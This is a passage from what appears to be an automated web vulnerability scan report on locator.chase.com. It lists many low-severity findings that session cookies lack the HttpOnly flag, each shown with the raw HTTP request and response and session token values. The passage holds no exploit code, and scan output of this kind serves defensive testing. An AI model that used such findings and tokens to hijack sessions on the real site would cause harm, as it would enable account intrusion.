Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=A0892C71FA34D1655EDC7CDF3CACA563.ftc-web1; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"308-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 308
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a.......>>>............mmmzzzyyx333............}}}{{{bbbXXXaaa..............................WWW....................................................................................................
...[SNIP]...

11.20. https://locator.chase.com/images/contextualHelpIcon.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/contextualHelpIcon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=B6EB46D01976F36F478C80991FE644B1.ftc-web3; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/contextualHelpIcon.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:04 GMT
Server: Apache
Set-Cookie: JSESSIONID=B6EB46D01976F36F478C80991FE644B1.ftc-web3; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"320-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 320
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a
....,.F.0...F.-D./F.1C..G.1.........h.Uh.V......F.*H.,h.W......H........E.0...\.L......`.ME.-...H..C.0].My.hG.-E.....F./E.,F.,G./...F......3f....................................................
...[SNIP]...

11.21. https://locator.chase.com/images/dblue_left_bg_top.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/dblue_left_bg_top.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=15A81D284C2BD2943EE734B2DB525810.ftc-web2; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dblue_left_bg_top.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=15A81D284C2BD2943EE734B2DB525810.ftc-web2; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"1072-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 1072
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a
.-....A.....Md}G.....u.....A..Ep.A.....R.....g..Xx.Ks.\w.s..<m.k..]..^..J...c.Uw.<Nai.._..].....C..Su.P.....Ns.Ne~u..J..F..K..o..H..c..n......d.Wx.F.....o..@|....Sv.]|.Qu.Gp.T..Cn.L..M..D..O..~
...[SNIP]...

11.22. https://locator.chase.com/images/dblue_right_bg_top.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/dblue_right_bg_top.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=B4039565E819A8176F7665BA47036EE8.ftc-web2; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dblue_right_bg_top.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:04 GMT
Server: Apache
Set-Cookie: JSESSIONID=B4039565E819A8176F7665BA47036EE8.ftc-web2; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"1117-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 1117
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a
.-....A.....G..A..Md}Ep.......R.....`..C..r..x..Yy.B..B..u..\w.O..l..Xx.f..<m.u..n...c.R..r..{..<p.b~.H..J.....i..h..J..W..H..C..=l....]..d..?QeVw.B..Z..e.....z..x.....g..s..o..^.....An.Y..q..Y
...[SNIP]...

11.23. https://locator.chase.com/images/loadingAnimation.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/loadingAnimation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=2AA7121C75DBCA8EDB251193E3900D52.ftc-web3; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/loadingAnimation.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=2AA7121C75DBCA8EDB251193E3900D52.ftc-web3; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"5886-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 5886
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a......................................................................................................!..NETSCAPE2.0.....!...
...,.......... .@Ri.h..l..p,.tm..#6N......+.r..rD4...h..@F.Cj.z]L.
...[SNIP]...

11.24. https://locator.chase.com/images/nav_tab_active.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/nav_tab_active.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=7E1DDC48CCEBEA6B00595950E8641B73.ftc-web1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav_tab_active.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=653EDE8B1FDAA57A2A96A2BAB5841638.ftc-web3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=7E1DDC48CCEBEA6B00595950E8641B73.ftc-web1; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"150-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 150
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a.."....................................................................................................!.......,......"....`$.d).H..M ,.....(!.;

11.25. https://locator.chase.com/images/nav_tab_bg.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/nav_tab_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=2AA533788B54A51F38AC132F48F9F527.ftc-web4; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav_tab_bg.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=2AA533788B54A51F38AC132F48F9F527.ftc-web4; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"2904-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 2904
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a..B...............................................................................................................................................................................................
...[SNIP]...

11.26. https://locator.chase.com/images/nav_tab_hover.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/nav_tab_hover.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=4291D3E127C0DAAE60EADF91EEB6C80E.ftc-web2; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav_tab_hover.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=653EDE8B1FDAA57A2A96A2BAB5841638.ftc-web3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=4291D3E127C0DAAE60EADF91EEB6C80E.ftc-web2; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"150-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 150
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a.."....................................................................................................!.......,......"....`$.d)B.`0.3$DP(G# !.;

11.27. https://locator.chase.com/images/nav_tab_side.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/nav_tab_side.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=8555A135D2EB43E138B7F4E4F3CC59D6.ftc-web3; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav_tab_side.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=8555A135D2EB43E138B7F4E4F3CC59D6.ftc-web3; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"173-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 173
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a.."....................................................................................................!.......,......"...*`$M"9....l...3.c0..1
#1:..H1...#.(1...#.(..;

11.28. https://locator.chase.com/images/search_green.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/search_green.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=4BCFEF68D18B09F2BDBDB6587C6DC3C6.ftc-web4; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/search_green.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=4BCFEF68D18B09F2BDBDB6587C6DC3C6.ftc-web4; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"637-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 637
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89ah............}.U..r.........s.G.;2...... U.... X..>s Y.....T.h.9.@v.@u.G..<3.S. V...d.E X..)L.N..Q..O...9.!=..5.Mb.<o.E.=zK.=6.660]4.0X;g(2pW.ED..4.>r.S....].+..................................
...[SNIP]...

11.29. https://locator.chase.com/images/searchcapbg.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/searchcapbg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=27B85406205DAE1B5C0A27C814CD491B.ftc-web4; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/searchcapbg.png HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=27B85406205DAE1B5C0A27C814CD491B.ftc-web4; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"3790-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 3790
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png;charset=ISO-8859-1

.PNG
.
...IHDR.......*......T......PLTE!BU!He)Tm8..!FY)\.0h.8..)Zs0q.8..!Cb:..3t.-cy,z.)Wp+v.+q.0e.0l."I\+s.0l.=..+w.&Rb1..#Pk,t.0o.1~.#Uo+y.-}.)S{+n./..+u.;..)W.K..&M^,..*k.,P`"Kn/f.8..+]y8..-{....
...[SNIP]...

11.30. https://locator.chase.com/images/textbox_bg.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/textbox_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=5F6F4D91B9A19FBAA7503496731A1938.ftc-web1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/textbox_bg.gif HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=5F6F4D91B9A19FBAA7503496731A1938.ftc-web1; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"67-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Content-Length: 67
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89a............................!.......,...........H.#.0J...;

11.31. https://locator.chase.com/jsp/SearchPage.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/jsp/SearchPage.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=E6E7F423B782399ACE6AFDF9C2ECA5B9.ftc-web2; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.32. https://locator.chase.com/jsp/content/balloon.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/jsp/content/balloon.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=AED79ADF14DAB982A7A37CDFF1416675.ftc-web3; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/content/balloon.css HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; JSESSIONID=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=AED79ADF14DAB982A7A37CDFF1416675.ftc-web3; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"833-1310078224000"
Last-Modified: Thu, 07 Jul 2011 22:37:04 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 833
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/css;charset=ISO-8859-1

... #ligeo-balloonPanels p,#ligeo-balloonPanels li,#ligeo-balloonPanels table,#ligeo-balloonPanels address,#ligeo-balloonPanels dl{color:#333;font-size:11px;line-height:13px;font-style:normal;}.ligeo-
...[SNIP]...

11.33. https://locator.chase.com/jsp/content/chase_main.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/jsp/content/chase_main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=4CA2E2FAB676181AD2C3F71911A369EC.ftc-web1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/content/chase_main.css HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; JSESSIONID=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=4CA2E2FAB676181AD2C3F71911A369EC.ftc-web1; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"39537-1310076256000"
Last-Modified: Thu, 07 Jul 2011 22:04:16 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 39537
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/css;charset=ISO-8859-1

html,body{_height:100%;}body{font-size:12px;margin:0;color:#4d4d4d;font-family:arial,verdana,helvetica,sans-serif;background-color:#e5e5e5;padding:0;text-align:center;}img{border:none;}h1,h2,h3{displa
...[SNIP]...

11.34. https://locator.chase.com/jsp/content/chrome.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/jsp/content/chrome.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=AFC97F84B90FAB9DBA6AC254C12B078B.ftc-web1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/content/chrome.css HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; JSESSIONID=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=AFC97F84B90FAB9DBA6AC254C12B078B.ftc-web1; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"248-1310075672000"
Last-Modified: Thu, 07 Jul 2011 21:54:32 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 248
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/css;charset=ISO-8859-1

@media screen and (-webkit-min-device-pixel-ratio:0) {
.atmaddressblockpointer { outline:none }
}

@media screen and (-webkit-min-device-pixel-ratio:0) {
.rollOverDivRelVisa { margin-left: 54
...[SNIP]...

11.35. https://locator.chase.com/jsp/content/unknown_card_page.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/jsp/content/unknown_card_page.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=4821074CB27BECACB5CF831DD092C6F9.ftc-web3; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/content/unknown_card_page.css HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; JSESSIONID=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=4821074CB27BECACB5CF831DD092C6F9.ftc-web3; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"22941-1310078226000"
Last-Modified: Thu, 07 Jul 2011 22:37:06 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 22941
